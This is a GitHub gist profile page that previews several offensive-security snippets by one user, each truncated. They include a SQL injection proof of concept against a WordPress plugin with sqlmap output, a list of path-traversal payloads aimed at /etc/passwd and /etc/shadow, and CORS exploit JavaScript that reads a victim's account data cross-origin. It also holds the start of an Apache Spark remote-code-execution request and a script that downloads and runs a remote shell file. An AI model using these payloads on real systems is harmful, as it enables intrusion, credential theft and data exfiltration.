Skip to content

Instantly share code, notes, and snippets.

View pikpikcu's full-sized avatar
😊
putune simbah

PikPikcU pikpikcu

😊
putune simbah
495 followers · 129 following
View GitHub Profile
@pikpikcu
pikpikcu / poc wp.md
Last active April 22, 2024 13:41
POC WP

WordPress Plugin - Google Review Slider 6.1 SQL Injection

poc:

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

sqlmap result:

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
@pikpikcu
pikpikcu / vps-gc.sh
Last active April 21, 2024 09:19
#!/bin/bash
wget -O ng.sh https://github.com/kmille36/Docker-Ubuntu-Desktop-NoMachine/raw/main/ngrok.sh > /dev/null 2>&1
chmod +x ng.sh
./ng.sh
function goto
{
label=$1
cd
@pikpikcu
pikpikcu / .zshrc
Created January 27, 2020 16:09
```zshrc
#▄███████▄ ▄████████ ▄█ █▄ ▄████████ ▄████████
#██▀ ▄██ ███ ███ ███ ███ ███ ███ ███ ███
# ▄███▀ ███ █▀ ███ ███ ███ ███ ███ █▀
#▀█▀▄███▀▄▄ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄▄██▀ ███
# ▄███▀ ▀ ▀███████████ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀▀▀ ███
#▄███▀ ███ ███ ███ ▀███████████ ███ █▄
#███▄ ▄█ ▄█ ███ ███ ███ ███ ███ ███ ███
#▀████████▀ ▄████████▀ ███ █▀ ███ ███ ████████▀
# ███ ███
@pikpikcu
pikpikcu / lfi.txt
Created August 29, 2020 10:11
lfi payloads
/etc/master.passwd
/master.passwd
/etc/passwd
/etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
@pikpikcu
pikpikcu / my-xss-diary.md
Last active July 14, 2023 09:29
XSS
@pikpikcu
pikpikcu / xss-cheat-sheet.md
Created January 21, 2020 02:18
layout title
post
xss cheat sheet

# xss-cheat-sheet

# Basics Xss

HTML Context - Simple Tag Injection

@pikpikcu
pikpikcu / gist:1b6f3f48c4cad1954174a06822ed0b3e
Created July 13, 2020 12:20
dork
Dorks are cool
Dorks for Google, Shodan and BinaryEdge
Only for use on bug bounty programs or in cordination with a legal security assesment.
I am in no way responsible for the usage of these search queries.
Be responsible thanks - https://www.bugcrowd.com/resource/what-is-responsible-disclosure/
This repository is "under construction" feel free to make pull requests :-)
@pikpikcu
pikpikcu / gist:fd90959881691bab11eb4d8b02acd6ea
Created June 29, 2020 14:43
CORS.html
<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from niche.co about user account
@pikpikcu
pikpikcu / sqli2.yaml
Created September 2, 2020 08:26 — forked from 0x240x23elu/sqli2.yaml
Basic SQL Injection Detections nuclei Template
id: SQLInjection_ERROR
info:
name: SQLINJECTION Detection
author: 0x240x23elu & OFJAAAH
severity: High
requests:
- method: GET
@pikpikcu
pikpikcu / Apache-Sprak-RCE.md
Created February 6, 2021 08:16

Apache Sprak RCE

POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{